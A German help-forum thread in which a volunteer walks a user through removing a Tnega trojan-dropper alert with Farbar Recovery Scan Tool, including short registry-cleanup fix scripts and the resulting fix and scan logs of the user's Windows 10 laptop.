HKEY_CURRENT_USER\Software\buskr5
HKEY_CURRENT_USER\Software\buskr51
HKEY_CURRENT_USER\Software\DATEV eG
HKEY_CURRENT_USER\Software\Deltaplan E-Mail V56
HKEY_CURRENT_USER\Software\FastViewer
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\HP
HKEY_CURRENT_USER\Software\IM Providers
HKEY_CURRENT_USER\Software\Intel
HKEY_CURRENT_USER\Software\MediaHuman
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Piriform
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\Selteco
HKEY_CURRENT_USER\Software\ShrewSoft
HKEY_CURRENT_USER\Software\TeamViewer
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes

========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 71370235 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 7144946 B
Edge => 46093 B
Chrome => 50936185 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 272310 B
ITMueller => 143773872 B
buskr5 => 186967393 B

RecycleBin => 163111320 B
EmptyTemp: => 604.8 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 00:41:27 ====
         

Alt 10.01.2021, 00:58   #7
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    DeleteValue: HKCU\Environment|buskr5
    cmd: reg query "HKCU\Software\buskr5" /s
    cmd: reg query "HKCU\Software\buskr51" /s
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.01.2021, 01:11   #8
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Der Text im Fixlog war leider deutlich zu lang.

Ich hoffe im angehängten .zip ist es auch okay
Angehängte Dateien
Dateityp: zip Fixlog.zip (571,8 KB, 63x aufgerufen)

Alt 10.01.2021, 01:17   #9
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    DeleteKey: HKCU\Software\buskr5
    DeleteKey: HKCU\Software\buskr51
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.01.2021, 01:22   #10
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von buskr5 (10-01-2021 01:21:30) Run:3
Gestartet von C:\Users\buskr5\Downloads
Geladene Profile: buskr5
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
DeleteKey: HKCU\Software\buskr5
DeleteKey: HKCU\Software\buskr51

*****************

HKCU\Software\buskr5 => erfolgreich entfernt
HKCU\Software\buskr51 => erfolgreich entfernt

==== Ende von Fixlog 01:21:30 ====
         

Alt 10.01.2021, 01:31   #11
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Starte den Rechner mal neu und berichte ob das mit dem Onlinebanking jetzt weg ist. Und auch neue FRST-Logs.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.01.2021, 01:37   #12
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Neu gestartet:

-> Keine Auffälligkeiten beim online Banking

Werden jetzt noch den Scan von MS Defender laufen lassen.

Alt 10.01.2021, 01:42   #13
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Bitte mach erstmal neue Logs. Den Defender kannst du immer noch laufen lassen.-
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.01.2021, 09:07   #14
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von buskr5 (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (10-01-2021 09:03:13)
Gestartet von C:\Users\buskr5\Downloads
Geladene Profile: buskr5
Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Chrome
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe
(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe
(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\GfxDownloadWrapper.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\System32\upfc.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1
Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250
Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1

Edge: 
======
DownloadDir: C:\Users\buskr5\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]
Edge DownloadDir: C:\Users\buskr5\Downloads
Edge StartupUrls: Default -> "hxxp://google.de/"

FireFox:
========
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-10]
CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-10]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-10]
CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]
CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]
CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]
CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]
CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]
CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]
CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-10]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )
R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)
U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]
S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-10 09:03 - 2021-01-10 09:04 - 000019356 _____ C:\Users\buskr5\Downloads\FRST.txt
2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe
2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2021-01-09 15:27 - 2021-01-09 15:27 - 000000000 ____D C:\Users\ITMueller\AppData\Local\PeerDistRepub
2021-01-09 15:09 - 2021-01-09 15:16 - 000031957 _____ C:\Users\ITMueller\Downloads\Addition.txt
2021-01-09 15:07 - 2021-01-09 15:16 - 000026221 _____ C:\Users\ITMueller\Downloads\FRST.txt
2021-01-09 15:05 - 2021-01-10 09:03 - 000000000 ____D C:\FRST
2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\ITMueller\Downloads\FRST64.exe
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\Desktop\Verkn
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Roaming\Apple Computer
2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Intel
2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html
2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg
2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575
2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner
